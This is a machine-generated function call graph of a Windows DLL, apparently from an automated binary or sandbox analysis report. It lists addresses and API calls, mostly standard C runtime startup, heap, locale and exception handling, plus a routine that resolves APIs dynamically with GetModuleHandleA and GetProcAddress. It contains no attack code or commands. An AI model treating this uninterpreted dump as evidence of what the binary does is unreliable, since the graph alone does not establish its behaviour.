RtlAllocateHeap 5979 24ed570c 5977->5979 5977->5980 5979->5954 5980->5976 5980->5977 5981 24ed474f __dosmaperr 7 API calls 5980->5981 5981->5980 5983 24ed35f2 RaiseException 5982->5983 5983->5961 5986 24ed479f ___DestructExceptionObject 5985->5986 5998 24ed5671 RtlEnterCriticalSection 5986->5998 5988 24ed47aa 5999 24ed47dc 5988->5999 5990 24ed47d1 _abort 5990->5972 5992 24ed2ae5 IsProcessorFeaturePresent 5991->5992 5993 24ed2ae3 5991->5993 5995 24ed2b58 5992->5995 5993->5974 6003 24ed2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5995->6003 5997 24ed2c3b 5997->5974 5998->5988 6002 24ed56b9 RtlLeaveCriticalSection 5999->6002 6001 24ed47e3 6001->5990 6002->6001 6003->5997 6007 24ed5b7a GetLastError 6004->6007 6008 24ed5b99 6007->6008 6009 24ed5b93 6007->6009 6014 24ed5bf0 SetLastError 6008->6014 6033 24ed637b 6008->6033 6026 24ed5e08 6009->6026 6013 24ed5bb3 6040 24ed571e 6013->6040 6015 24ed5bf9 6014->6015 6015->5979 6019 24ed5bb9 6021 24ed5be7 SetLastError 6019->6021 6020 24ed5bcf 6053 24ed593c 6020->6053 6021->6015 6024 24ed571e _free 17 API calls 6025 24ed5be0 6024->6025 6025->6014 6025->6021 6058 24ed5c45 6026->6058 6028 24ed5e2f 6029 24ed5e3b 6028->6029 6030 24ed5e47 TlsGetValue 6028->6030 6031 24ed2ada _ValidateLocalCookies 5 API calls 6029->6031 6030->6029 6032 24ed5e58 6031->6032 6032->6008 6038 24ed6388 __dosmaperr 6033->6038 6034 24ed63c8 6037 24ed6368 __dosmaperr 19 API calls 6034->6037 6035 24ed63b3 RtlAllocateHeap 6036 24ed5bab 6035->6036 6035->6038 6036->6013 6046 24ed5e5e 6036->6046 6037->6036 6038->6034 6038->6035 6039 24ed474f __dosmaperr 7 API calls 6038->6039 6039->6038 6041 24ed5729 HeapFree 6040->6041 6045 24ed5752 __dosmaperr 6040->6045 6042 24ed573e 6041->6042 6041->6045 6043 24ed6368 __dosmaperr 18 API calls 6042->6043 6044 24ed5744 GetLastError 6043->6044 6044->6045 6045->6019 6047 24ed5c45 __dosmaperr 5 API calls 6046->6047 6048 24ed5e85 6047->6048 6049 24ed5ea0 TlsSetValue 6048->6049 6050 24ed5e94 6048->6050 6049->6050 6051 24ed2ada _ValidateLocalCookies 5 API calls 6050->6051 6052 24ed5bc8 6051->6052 6052->6013 6052->6020 6064 24ed5914 6053->6064 6059 24ed5c75 __crt_fast_encode_pointer 6058->6059 6061 24ed5c71 6058->6061 6059->6028 6060 24ed5c95 6060->6059 6063 24ed5ca1 GetProcAddress 6060->6063 6061->6059 6061->6060 6062 24ed5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6061->6062 6062->6061 6063->6059 6065 24ed5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6064->6065 6066 24ed5938 6065->6066 6067 24ed58c4 6066->6067 6068 24ed5758 __dosmaperr 20 API calls 6067->6068 6069 24ed58e8 6068->6069 6069->6024 6071 24ed1ca6 _strlen 6070->6071 6071->5966 6072 24ed20db 6074 24ed20e7 ___DestructExceptionObject 6072->6074 6073 24ed20f6 6074->6073 6075 24ed2110 dllmain_raw 6074->6075 6079 24ed210b 6074->6079 6075->6073 6076 24ed212a 6075->6076 6085 24ed1eec 6076->6085 6078 24ed2177 6078->6073 6080 24ed1eec 31 API calls 6078->6080 6079->6073 6079->6078 6082 24ed1eec 31 API calls 6079->6082 6081 24ed218a 6080->6081 6081->6073 6083 24ed2193 dllmain_raw 6081->6083 6084 24ed216d dllmain_raw 6082->6084 6083->6073 6084->6078 6086 24ed1f2a dllmain_crt_process_detach 6085->6086 6087 24ed1ef7 6085->6087 6094 24ed1f06 6086->6094 6088 24ed1f1c dllmain_crt_process_attach 6087->6088 6089 24ed1efc 6087->6089 6088->6094 6090 24ed1f01 6089->6090 6091 24ed1f12 6089->6091 6090->6094 6095 24ed240b 6090->6095 6100 24ed23ec 6091->6100 6094->6079 6108 24ed53e5 6095->6108 6247 24ed3513 6100->6247 6103 24ed23f5 6103->6094 6106 24ed2408 6106->6094 6107 24ed351e 7 API calls 6107->6103 6114 24ed5aca 6108->6114 6111 24ed351e 6218 24ed3820 6111->6218 6113 24ed2415 6113->6094 6115 24ed5ad4 6114->6115 6117 24ed2410 6114->6117 6116 24ed5e08 __dosmaperr 11 API calls 6115->6116 6118 24ed5adb 6116->6118 6117->6111 6118->6117 6119 24ed5e5e __dosmaperr 11 API calls 6118->6119 6120 24ed5aee 6119->6120 6122 24ed59b5 6120->6122 6123 24ed59c0 6122->6123 6124 24ed59d0 6122->6124 6128 24ed59d6 6123->6128 6124->6117 6127 24ed571e _free 20 API calls 6127->6124 6129 24ed59e9 6128->6129 6130 24ed59ef 6128->6130 6131 24ed571e _free 20 API calls 6129->6131 6132 24ed571e _free 20 API calls 6130->6132 6131->6130 6133 24ed59fb 6132->6133 6134 24ed571e _free 20 API calls 6133->6134 6135 24ed5a06 6134->6135 6136 24ed571e _free 20 API calls 6135->6136 6137 24ed5a11 6136->6137 6138 24ed571e _free 20 API calls 6137->6138 6139 24ed5a1c 6138->6139 6140 24ed571e _free 20 API calls 6139->6140 6141 24ed5a27 6140->6141 6142 24ed571e _free 20 API calls 6141->6142 6143 24ed5a32 6142->6143 6144 24ed571e _free 20 API calls 6143->6144 6145 24ed5a3d 6144->6145 6146 24ed571e _free 20 API calls 6145->6146 6147 24ed5a48 6146->6147 6148 24ed571e _free 20 API calls 6147->6148 6149 24ed5a56 6148->6149 6154 24ed589c 6149->6154 6160 24ed57a8 6154->6160 6156 24ed58c0 6157 24ed58ec 6156->6157 6173 24ed5809 6157->6173 6159 24ed5910 6159->6127 6161 24ed57b4 ___DestructExceptionObject 6160->6161 6168 24ed5671 RtlEnterCriticalSection 6161->6168 6164 24ed57be 6165 24ed571e _free 20 API calls 6164->6165 6167 24ed57e8 6164->6167 6165->6167 6166 24ed57f5 _abort 6166->6156 6169 24ed57fd 6167->6169 6168->6164 6172 24ed56b9 RtlLeaveCriticalSection 6169->6172 6171 24ed5807 6171->6166 6172->6171 6174 24ed5815 ___DestructExceptionObject 6173->6174 6181 24ed5671 RtlEnterCriticalSection 6174->6181 6176 24ed581f 6182 24ed5a7f 6176->6182 6178 24ed5832 6186 24ed5848 6178->6186 6180 24ed5840 _abort 6180->6159 6181->6176 6183 24ed5ab5 __fassign 6182->6183 6184 24ed5a8e __fassign 6182->6184 6183->6178 6184->6183 6189 24ed7cc2 6184->6189 6217 24ed56b9 RtlLeaveCriticalSection 6186->6217 6188 24ed5852 6188->6180 6191 24ed7d42 6189->6191 6192 24ed7cd8 6189->6192 6190 24ed7e35 __fassign 20 API calls 6200 24ed7d9e 6190->6200 6193 24ed571e _free 20 API calls 6191->6193 6215 24ed7d90 6191->6215 6192->6191 6197 24ed7d0b 6192->6197 6199 24ed571e _free 20 API calls 6192->6199 6194 24ed7d64 6193->6194 6195 24ed571e _free 20 API calls 6194->6195 6196 24ed7d77 6195->6196 6201 24ed571e _free 20 API calls 6196->6201 6202 24ed571e _free 20 API calls 6197->6202 6216 24ed7d2d 6197->6216 6198 24ed571e _free 20 API calls 6203 24ed7d37 6198->6203 6205 24ed7d00 6199->6205 6204 24ed7dfe 6200->6204 6213 24ed571e 20 API calls _free 6200->6213 6206 24ed7d85 6201->6206 6207 24ed7d22 6202->6207 6208 24ed571e _free 20 API calls 6203->6208 6209 24ed571e _free 20 API calls 6204->6209 6210 24ed90ba ___free_lconv_mon 20 API calls 6205->6210 6211 24ed571e _free 20 API calls 6206->6211 6212 24ed91b8 __fassign 20 API calls 6207->6212 6208->6191 6214 24ed7e04 6209->6214 6210->6197 6211->6215 6212->6216 6213->6200 6214->6183 6215->6190 6216->6198 6217->6188 6219 24ed382d 6218->6219 6223 24ed384b ___vcrt_freefls@4 6218->6223 6220 24ed383b 6219->6220 6224 24ed3b67 6219->6224 6229 24ed3ba2 6220->6229 6223->6113 6234 24ed3a82 6224->6234 6226 24ed3b81 6227 24ed3b99 TlsGetValue 6226->6227 6228 24ed3b8d 6226->6228 6227->6228 6228->6220 6230 24ed3a82 try_get_function 5 API calls 6229->6230 6231 24ed3bbc 6230->6231 6232 24ed3bcb 6231->6232 6233 24ed3bd7 TlsSetValue 6231->6233 6232->6223 6233->6232 6235 24ed3aaa 6234->6235 6239 24ed3aa6 __crt_fast_encode_pointer 6234->6239 6235->6239 6240 24ed39be 6235->6240 6238 24ed3ac4 GetProcAddress 6238->6239 6239->6226 6241 24ed39cd try_get_first_available_module 6240->6241 6242 24ed39ea LoadLibraryExW 6241->6242 6244 24ed3a60 FreeLibrary 6241->6244 6245 24ed3a77 6241->6245 6246 24ed3a38 LoadLibraryExW 6241->6246 6242->6241 6243 24ed3a05 GetLastError 6242->6243 6243->6241 6244->6241 6245->6238 6245->6239 6246->6241 6253 24ed3856 6247->6253 6249 24ed23f1 6249->6103 6250 24ed53da 6249->6250 6251 24ed5b7a __dosmaperr 20 API calls 6250->6251 6252 24ed23fd 6251->6252 6252->6106 6252->6107 6254 24ed385f 6253->6254 6255 24ed3862 GetLastError 6253->6255 6254->6249 6256 24ed3b67 ___vcrt_FlsGetValue 6 API calls 6255->6256 6259 24ed3877 6256->6259 6257 24ed3896 6258 24ed38dc SetLastError 6257->6258 6258->6249 6259->6257 6259->6258 6260 24ed3ba2 ___vcrt_FlsSetValue 6 API calls 6259->6260 6261 24ed3890 6260->6261 6261->6257 6262 24ed38b8 6261->6262 6263 24ed3ba2 ___vcrt_FlsSetValue 6 API calls 6261->6263 6262->6257 6264 24ed3ba2 ___vcrt_FlsSetValue 6 API calls 6262->6264 6263->6262 6264->6257 6265 24ed66d5 6266 24ed66e1 6265->6266 6267 24ed66eb FindClose 6266->6267 6268 24ed66f2 6266->6268 6267->6268 6269 24ed2ada _ValidateLocalCookies 5 API calls 6268->6269 6270 24ed6701 6269->6270 7153 24ed73d5 7154 24ed73e1 ___DestructExceptionObject 7153->7154 7165 24ed5671 RtlEnterCriticalSection 7154->7165 7156 24ed73e8 7166 24ed8be3 7156->7166 7158 24ed73f7 7159 24ed7406 7158->7159 7179 24ed7269 GetStartupInfoW 7158->7179 7190 24ed7422 7159->7190 7163 24ed7417 _abort 7165->7156 7167 24ed8bef ___DestructExceptionObject 7166->7167 7168 24ed8bfc 7167->7168 7169 24ed8c13 7167->7169 7170 24ed6368 __dosmaperr 20 API calls 7168->7170 7193 24ed5671 RtlEnterCriticalSection 7169->7193 7172 24ed8c01 7170->7172 7173 24ed62ac _abort 26 API calls 7172->7173 7174 24ed8c0b _abort 7173->7174 7174->7158 7175 24ed8c4b 7201 24ed8c72 7175->7201 7177 24ed8c1f 7177->7175 7194 24ed8b34 7177->7194 7180 24ed7318 7179->7180 7181 24ed7286 7179->7181 7185 24ed731f 7180->7185 7181->7180 7182 24ed8be3 27 API calls 7181->7182 7183 24ed72af 7182->7183 7183->7180 7184 24ed72dd GetFileType 7183->7184 7184->7183 7187 24ed7326 7185->7187 7186 24ed7369 GetStdHandle 7186->7187 7187->7186 7188 24ed73d1 7187->7188 7189 24ed737c GetFileType 7187->7189 7188->7159 7189->7187 7205 24ed56b9 RtlLeaveCriticalSection 7190->7205 7192 24ed7429 7192->7163 7193->7177 7195 24ed637b __dosmaperr 20 API calls 7194->7195 7196 24ed8b46 7195->7196 7198 24ed5eb7 11 API calls 7196->7198 7200 24ed8b53 7196->7200 7197 24ed571e _free 20 API calls 7199 24ed8ba5 7197->7199 7198->7196 7199->7177 7200->7197 7204 24ed56b9 RtlLeaveCriticalSection 7201->7204 7203 24ed8c79 7203->7174 7204->7203 7205->7192 6271 24ed4ed7 6282 24ed6d60 6271->6282 6276 24ed4ef4 6278 24ed571e _free 20 API calls 6276->6278 6279 24ed4f29 6278->6279 6280 24ed4eff 6281 24ed571e _free 20 API calls 6280->6281 6281->6276 6283 24ed6d69 6282->6283 6284 24ed4ee9 6282->6284 6315 24ed6c5f 6283->6315 6286 24ed7153 GetEnvironmentStringsW 6284->6286 6287 24ed716a 6286->6287 6297 24ed71bd 6286->6297 6288 24ed7170 WideCharToMultiByte 6287->6288 6291 24ed718c 6288->6291 6288->6297 6289 24ed4eee 6289->6276 6298 24ed4f2f 6289->6298 6290 24ed71c6 FreeEnvironmentStringsW 6290->6289 6292 24ed56d0 21 API calls 6291->6292 6293 24ed7192 6292->6293 6294 24ed7199 WideCharToMultiByte 6293->6294 6295 24ed71af 6293->6295 6294->6295 6296 24ed571e _free 20 API calls 6295->6296 6296->6297 6297->6289 6297->6290 6299 24ed4f44 6298->6299 6300 24ed637b __dosmaperr 20 API calls 6299->6300 6311 24ed4f6b 6300->6311 6301 24ed4fcf 6302 24ed571e _free 20 API calls 6301->6302 6303 24ed4fe9 6302->6303 6303->6280 6304 24ed637b __dosmaperr 20 API calls 6304->6311 6305 24ed4fd1 6724 24ed5000 6305->6724 6309 24ed571e _free 20 API calls 6309->6301 6310 24ed4ff3 6312 24ed62bc _abort 11 API calls 6310->6312 6311->6301 6311->6304 6311->6305 6311->6310 6313 24ed571e _free 20 API calls 6311->6313 6715 24ed544d 6311->6715 6314 24ed4fff 6312->6314 6313->6311 6335 24ed5af6 GetLastError 6315->6335 6317 24ed6c6c 6355 24ed6d7e 6317->6355 6319 24ed6c74 6364 24ed69f3 6319->6364 6322 24ed6c8b 6322->6284 6327 24ed571e _free 20 API calls 6327->6322 6328 24ed6cc9 6329 24ed6368 __dosmaperr 20 API calls 6328->6329 6334 24ed6cce 6329->6334 6330 24ed6ce6 6331 24ed6d12 6330->6331 6332 24ed571e _free 20 API calls 6330->6332 6331->6334 6388 24ed68c9 6331->6388 6332->6331 6334->6327 6336 24ed5b0c 6335->6336 6337 24ed5b12 6335->6337 6338 24ed5e08 __dosmaperr 11 API calls 6336->6338 6339 24ed637b __dosmaperr 20 API calls 6337->6339 6342 24ed5b61 SetLastError 6337->6342 6338->6337 6340 24ed5b24 6339->6340 6341 24ed5b2c 6340->6341 6343 24ed5e5e __dosmaperr 11 API calls 6340->6343 6344 24ed571e _free 20 API calls 6341->6344 6342->6317 6345 24ed5b41 6343->6345 6346 24ed5b32 6344->6346 6345->6341 6347 24ed5b48 6345->6347 6348 24ed5b6d SetLastError 6346->6348 6349 24ed593c __dosmaperr 20 API calls 6347->6349 6391 24ed55a8 6348->6391 6350 24ed5b53 6349->6350 6353 24ed571e _free 20 API calls 6350->6353 6354 24ed5b5a 6353->6354 6354->6342 6354->6348 6356 24ed6d8a ___DestructExceptionObject 6355->6356 6357 24ed5af6 _abort 38 API calls 6356->6357 6359 24ed6d94 6357->6359 6361 24ed55a8 _abort 38 API calls 6359->6361 6362 24ed6e18 _abort 6359->6362 6363 24ed571e _free 20 API calls 6359->6363 6564 24ed5671 RtlEnterCriticalSection 6359->6564 6565 24ed6e0f 6359->6565 6361->6359 6362->6319 6363->6359 6569 24ed54a7 6364->6569 6367 24ed6a14 GetOEMCP 6369 24ed6a3d 6367->6369 6368 24ed6a26 6368->6369 6370 24ed6a2b GetACP 6368->6370 6369->6322 6371 24ed56d0 6369->6371 6370->6369 6372 24ed570e 6371->6372 6377 24ed56de __dosmaperr 6371->6377 6374 24ed6368 __dosmaperr 20 API calls 6372->6374 6373 24ed56f9 RtlAllocateHeap 6375 24ed570c 6373->6375 6373->6377 6374->6375 6375->6334 6378 24ed6e20 6375->6378 6376 24ed474f __dosmaperr 7 API calls 6376->6377 6377->6372 6377->6373 6377->6376 6379 24ed69f3 40 API calls 6378->6379 6380 24ed6e3f 6379->6380 6383 24ed6e90 IsValidCodePage 6380->6383 6385 24ed6e46 6380->6385 6387 24ed6eb5 ___scrt_fastfail 6380->6387 6381 24ed2ada _ValidateLocalCookies 5 API calls 6382 24ed6cc1 6381->6382 6382->6328 6382->6330 6384 24ed6ea2 GetCPInfo 6383->6384 6383->6385 6384->6385 6384->6387 6385->6381 6606 24ed6acb GetCPInfo 6387->6606 6679 24ed6886 6388->6679 6390 24ed68ed 6390->6334 6402 24ed7613 6391->6402 6394 24ed55b8 6396 24ed55c2 IsProcessorFeaturePresent 6394->6396 6401 24ed55e0 6394->6401 6398 24ed55cd 6396->6398 6432 24ed60e2 6398->6432 6438 24ed4bc1 6401->6438 6441 24ed7581 6402->6441 6405 24ed766e 6406 24ed767a _abort 6405->6406 6407 24ed76a1 _abort 6406->6407 6408 24ed5b7a __dosmaperr 20 API calls 6406->6408 6413 24ed76a7 _abort 6406->6413 6409 24ed76f3 6407->6409 6407->6413 6431 24ed76d6 6407->6431 6408->6407 6410 24ed6368 __dosmaperr 20 API calls 6409->6410 6411 24ed76f8 6410->6411 6455 24ed62ac 6411->6455 6417 24ed771f 6413->6417 6458 24ed5671 RtlEnterCriticalSection 6413->6458 6419 24ed777e 6417->6419 6421 24ed7776 6417->6421 6428 24ed77a9 6417->6428 6459 24ed56b9 RtlLeaveCriticalSection 6417->6459 6419->6428 6460 24ed7665 6419->6460 6422 24ed4bc1 _abort 28 API calls 6421->6422 6422->6419 6425 24ed5af6 _abort 38 API calls 6429 24ed780c 6425->6429 6427 24ed7665 _abort 38 API calls 6427->6428 6463 24ed782e 6428->6463 6430 24ed5af6 _abort 38 API calls 6429->6430 6429->6431 6430->6431 6467 24edbdc9 6431->6467 6433 24ed60fe ___scrt_fastfail 6432->6433 6434 24ed612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6433->6434 6435 24ed61fb ___scrt_fastfail 6434->6435 6436 24ed2ada _ValidateLocalCookies 5 API calls 6435->6436 6437 24ed6219 6436->6437 6437->6401 6486 24ed499b 6438->6486 6444 24ed7527 6441->6444 6443 24ed55ad 6443->6394 6443->6405 6445 24ed7533 ___DestructExceptionObject 6444->6445 6450 24ed5671 RtlEnterCriticalSection 6445->6450 6447 24ed7541 6451 24ed7575 6447->6451 6449 24ed7568 _abort 6449->6443 6450->6447 6454 24ed56b9 RtlLeaveCriticalSection 6451->6454 6453 24ed757f 6453->6449 6454->6453 6470 24ed6231 6455->6470 6457 24ed62b8 6457->6431 6458->6417 6459->6421 6461 24ed5af6 _abort 38 API calls 6460->6461 6462 24ed766a 6461->6462 6462->6427 6464 24ed77fd 6463->6464 6465 24ed7834 6463->6465 6464->6425 6464->6429 6464->6431 6485 24ed56b9 RtlLeaveCriticalSection 6465->6485 6468 24ed2ada _ValidateLocalCookies 5 API calls 6467->6468 6469 24edbdd4 6468->6469 6469->6469 6471 24ed5b7a __dosmaperr 20 API calls 6470->6471 6472 24ed6247 6471->6472 6473 24ed6255 6472->6473 6474 24ed62a6 6472->6474 6478 24ed2ada _ValidateLocalCookies 5 API calls 6473->6478 6481 24ed62bc IsProcessorFeaturePresent 6474->6481 6476 24ed62ab 6477 24ed6231 _abort 26 API calls 6476->6477 6479 24ed62b8 6477->6479 6480 24ed627c 6478->6480 6479->6457 6480->6457 6482 24ed62c7 6481->6482 6483 24ed60e2 _abort 8 API calls 6482->6483 6484 24ed62dc GetCurrentProcess TerminateProcess 6483->6484 6484->6476 6485->6464 6487 24ed49a7 _abort 6486->6487 6495 24ed49bf 6487->6495 6508 24ed4af5 GetModuleHandleW 6487->6508 6494 24ed4a3c 6498 24ed4a54 6494->6498 6521 24ed4669 6494->6521 6517 24ed5671 RtlEnterCriticalSection 6495->6517 6496 24ed4aae 6504 24edbdc9 _abort 5 API calls 6496->6504 6497 24ed4a82 6528 24ed4ab4 6497->6528 6500 24ed4669 _abort 5 API calls 6498->6500 6506 24ed4a65 6500->6506 6501 24ed49c7 6501->6494 6501->6506 6518 24ed527a 6501->6518 6505 24ed4ab3 6504->6505 6525 24ed4aa5 6506->6525 6509 24ed49b3 6508->6509 6509->6495 6510 24ed4b39 GetModuleHandleExW 6509->6510 6511 24ed4b63 GetProcAddress 6510->6511 6514 24ed4b78 6510->6514 6511->6514 6512 24ed4b8c FreeLibrary 6513 24ed4b95 6512->6513 6515 24ed2ada _ValidateLocalCookies 5 API calls 6513->6515 6514->6512 6514->6513 6516 24ed4b9f 6515->6516 6516->6495 6517->6501 6536 24ed5132 6518->6536 6522 24ed4698 6521->6522 6523 24ed2ada _ValidateLocalCookies 5 API calls 6522->6523 6524 24ed46c1 6523->6524 6524->6498 6557 24ed56b9 RtlLeaveCriticalSection 6525->6557 6527 24ed4a7e 6527->6496 6527->6497 6558 24ed6025 6528->6558 6531 24ed4ae2 6534 24ed4b39 _abort 8 API calls 6531->6534 6532 24ed4ac2 GetPEB 6532->6531 6533 24ed4ad2 GetCurrentProcess TerminateProcess 6532->6533 6533->6531 6535 24ed4aea ExitProcess 6534->6535 6539 24ed50e1 6536->6539 6538 24ed5156 6538->6494 6540 24ed50ed ___DestructExceptionObject 6539->6540 6547 24ed5671 RtlEnterCriticalSection 6540->6547 6542 24ed50fb 6548 24ed515a 6542->6548 6546 24ed5119 _abort 6546->6538 6547->6542 6551 24ed5182 6548->6551 6552 24ed517a 6548->6552 6549 24ed2ada _ValidateLocalCookies 5 API calls 6550 24ed5108 6549->6550 6554 24ed5126 6550->6554 6551->6552 6553 24ed571e _free 20 API calls 6551->6553 6552->6549 6553->6552 6555 24ed56b9 _abort RtlLeaveCriticalSection 6554->6555 6556 24ed5130 6555->6556 6556->6546 6557->6527 6559 24ed604a 6558->6559 6563 24ed6040 6558->6563 6560 24ed5c45 __dosmaperr 5 API calls 6559->6560 6560->6563 6561 24ed2ada _ValidateLocalCookies 5 API calls 6562 24ed4abe 6561->6562 6562->6531 6562->6532 6563->6561 6564->6359 6568 24ed56b9 RtlLeaveCriticalSection 6565->6568 6567 24ed6e16 6567->6359 6568->6567 6570 24ed54c4 6569->6570 6571 24ed54ba 6569->6571 6570->6571 6572 24ed5af6 _abort 38 API calls 6570->6572 6571->6367 6571->6368 6573 24ed54e5 6572->6573 6577 24ed7a00 6573->6577 6578 24ed54fe 6577->6578 6579 24ed7a13 6577->6579 6581 24ed7a2d 6578->6581 6579->6578 6585 24ed7f0f 6579->6585 6582 24ed7a40 6581->6582 6584 24ed7a55 6581->6584 6583 24ed6d7e __fassign 38 API calls 6582->6583 6582->6584 6583->6584 6584->6571 6586 24ed7f1b ___DestructExceptionObject 6585->6586 6587 24ed5af6 _abort 38 API calls 6586->6587 6588 24ed7f24 6587->6588 6591 24ed7f72 _abort 6588->6591 6597 24ed5671 RtlEnterCriticalSection 6588->6597 6590 24ed7f42 6598 24ed7f86 6590->6598 6591->6578 6596 24ed55a8 _abort 38 API calls 6596->6591 6597->6590 6599 24ed7f94 __fassign 6598->6599 6601 24ed7f56 6598->6601 6600 24ed7cc2 __fassign 20 API calls 6599->6600 6599->6601 6600->6601 6602 24ed7f75 6601->6602 6605 24ed56b9 RtlLeaveCriticalSection 6602->6605 6604 24ed7f69 6604->6591 6604->6596 6605->6604 6607 24ed6baf 6606->6607 6613 24ed6b05 6606->6613 6610 24ed2ada _ValidateLocalCookies 5 API calls 6607->6610 6612 24ed6c5b 6610->6612 6612->6385 6616 24ed86e4 6613->6616 6615 24ed8a3e 43 API calls 6615->6607 6617 24ed54a7 __fassign 38 API calls 6616->6617 6618 24ed8704 MultiByteToWideChar 6617->6618 6620 24ed8742 6618->6620 6628 24ed87da 6618->6628 6624 24ed56d0 21 API calls 6620->6624 6625 24ed8763 ___scrt_fastfail 6620->6625 6621 24ed2ada _ValidateLocalCookies 5 API calls 6622 24ed6b66 6621->6622 6630 24ed8a3e 6622->6630 6623 24ed87d4 6635 24ed8801 6623->6635 6624->6625 6625->6623 6627 24ed87a8 MultiByteToWideChar 6625->6627 6627->6623 6629 24ed87c4 GetStringTypeW 6627->6629 6628->6621 6629->6623 6631 24ed54a7 __fassign 38 API calls 6630->6631 6632 24ed8a51 6631->6632 6639 24ed8821 6632->6639 6636 24ed880d 6635->6636 6637 24ed881e 6635->6637 6636->6637 6638 24ed571e _free 20 API calls 6636->6638 6637->6628 6638->6637 6640 24ed883c 6639->6640 6641 24ed8862 MultiByteToWideChar 6640->6641 6642 24ed888c 6641->6642 6652 24ed8a16 6641->6652 6645 24ed56d0 21 API calls 6642->6645 6647 24ed88ad 6642->6647 6643 24ed2ada _ValidateLocalCookies 5 API calls 6644 24ed6b87 6643->6644 6644->6615 6645->6647 6646 24ed88f6 MultiByteToWideChar 6648 24ed890f 6646->6648 6662 24ed8962 6646->6662 6647->6646 6647->6662 6666 24ed5f19 6648->6666 6650 24ed8801 __freea 20 API calls 6650->6652 6652->6643 6653 24ed8939 6656 24ed5f19 11 API calls 6653->6656 6653->6662 6654 24ed8971 6657 24ed56d0 21 API calls 6654->6657 6660 24ed8992 6654->6660 6655 24ed8a07 6659 24ed8801 __freea 20 API calls 6655->6659 6656->6662 6657->6660 6658 24ed5f19 11 API calls 6661 24ed89e6 6658->6661 6659->6662 6660->6655 6660->6658 6661->6655 6663 24ed89f5 WideCharToMultiByte 6661->6663 6662->6650 6663->6655 6664 24ed8a35 6663->6664 6665 24ed8801 __freea 20 API calls 6664->6665 6665->6662 6667 24ed5c45 __dosmaperr 5 API calls 6666->6667 6668 24ed5f40 6667->6668 6671 24ed5f49 6668->6671 6674 24ed5fa1 6668->6674 6672 24ed2ada _ValidateLocalCookies 5 API calls 6671->6672 6673 24ed5f9b 6672->6673 6673->6653 6673->6654 6673->6662 6675 24ed5c45 __dosmaperr 5 API calls 6674->6675 6676 24ed5fc8 6675->6676 6677 24ed2ada _ValidateLocalCookies 5 API calls 6676->6677 6678 24ed5f89 LCMapStringW 6677->6678 6678->6671 6680 24ed6892 ___DestructExceptionObject 6679->6680 6687 24ed5671 RtlEnterCriticalSection 6680->6687 6682 24ed689c 6688 24ed68f1 6682->6688 6686 24ed68b5 _abort 6686->6390 6687->6682 6700 24ed7011 6688->6700 6690 24ed693f 6691 24ed7011 26 API calls 6690->6691 6692 24ed695b 6691->6692 6693 24ed7011 26 API calls 6692->6693 6694 24ed6979 6693->6694 6695 24ed68a9 6694->6695 6696 24ed571e _free 20 API calls 6694->6696 6697 24ed68bd 6695->6697 6696->6695 6714 24ed56b9 RtlLeaveCriticalSection 6697->6714 6699 24ed68c7 6699->6686 6701 24ed7022 6700->6701 6710 24ed701e 6700->6710 6702 24ed7029 6701->6702 6704 24ed703c ___scrt_fastfail 6701->6704 6703 24ed6368 __dosmaperr 20 API calls 6702->6703 6705 24ed702e 6703->6705 6707 24ed706a 6704->6707 6708 24ed7073 6704->6708 6704->6710 6706 24ed62ac _abort 26 API calls 6705->6706 6706->6710 6709 24ed6368 __dosmaperr 20 API calls 6707->6709 6708->6710 6712 24ed6368 __dosmaperr 20 API calls 6708->6712 6711 24ed706f 6709->6711 6710->6690 6713 24ed62ac _abort 26 API calls 6711->6713 6712->6711 6713->6710 6714->6699 6716 24ed5468 6715->6716 6717 24ed545a 6715->6717 6718 24ed6368 __dosmaperr 20 API calls 6716->6718 6717->6716 6721 24ed547f 6717->6721 6719 24ed5470 6718->6719 6720 24ed62ac _abort 26 API calls 6719->6720 6722 24ed547a 6720->6722 6721->6722 6723 24ed6368 __dosmaperr 20 API calls 6721->6723 6722->6311 6723->6719 6725 24ed500d 6724->6725 6726 24ed4fd7 6724->6726 6727 24ed5024 6725->6727 6728 24ed571e _free 20 API calls 6725->6728 6726->6309 6729 24ed571e _free 20 API calls 6727->6729 6728->6725 6729->6726 7653 24ed5351 7654 24ed5360 7653->7654 7658 24ed5374 7653->7658 7656 24ed571e _free 20 API calls 7654->7656 7654->7658 7655 24ed571e _free 20 API calls 7657 24ed5386 7655->7657 7656->7658 7659 24ed571e _free 20 API calls 7657->7659 7658->7655 7660 24ed5399 7659->7660 7661 24ed571e _free 20 API calls 7660->7661 7662 24ed53aa 7661->7662 7663 24ed571e _free 20 API calls 7662->7663 7664 24ed53bb 7663->7664 6730 24ed36d0 6731 24ed36e2 6730->6731 6733 24ed36f0 @_EH4_CallFilterFunc@8 6730->6733 6732 24ed2ada _ValidateLocalCookies 5 API calls 6731->6732 6732->6733 6734 24ed60ac 6735 24ed60b7 6734->6735 6737 24ed60dd 6734->6737 6736 24ed60c7 FreeLibrary 6735->6736 6735->6737 6736->6735 6967 24ed742b 6968 24ed7430 6967->6968 6970 24ed7453 6968->6970 6971 24ed8bae 6968->6971 6972 24ed8bbb 6971->6972 6976 24ed8bdd 6971->6976 6973 24ed8bc9 RtlDeleteCriticalSection 6972->6973 6974 24ed8bd7 6972->6974 6973->6973 6973->6974 6975 24ed571e _free 20 API calls 6974->6975 6975->6976 6976->6968 7206 24edc7a7 7207 24edc7be 7206->7207 7214 24edc80d 7206->7214 7207->7214 7215 24edc7e6 GetModuleHandleA 7207->7215 7209 24edc835 GetModuleHandleA 7209->7214 7210 24edc872 7211 24edc85f GetProcAddress 7211->7214 7214->7209 7214->7210 7214->7211 7216 24edc7ef 7215->7216 7222 24edc80d 7215->7222 7224 24edc803 GetProcAddress 7216->7224 7218 24edc835 GetModuleHandleA 7218->7222 7220 24edc872 7222->7218 7222->7220 7223 24edc85f GetProcAddress 7222->7223 7223->7222 7228 24edc80d 7224->7228 7225 24edc835 GetModuleHandleA 7225->7228 7226 24edc872 7227 24edc85f GetProcAddress 7227->7228 7228->7225 7228->7226 7228->7227 7229 24ed21a1 ___scrt_dllmain_exception_filter 6977 24ed543d 6978 24ed5440 6977->6978 6979 24ed55a8 _abort 38 API calls 6978->6979 6980 24ed544c 6979->6980 7665 24ed1f3f 7666 24ed1f4b ___DestructExceptionObject 7665->7666 7683 24ed247c 7666->7683 7668 24ed1f52 7669 24ed1f7c 7668->7669 7670 24ed2041 7668->7670 7677 24ed1f57 ___scrt_is_nonwritable_in_current_image 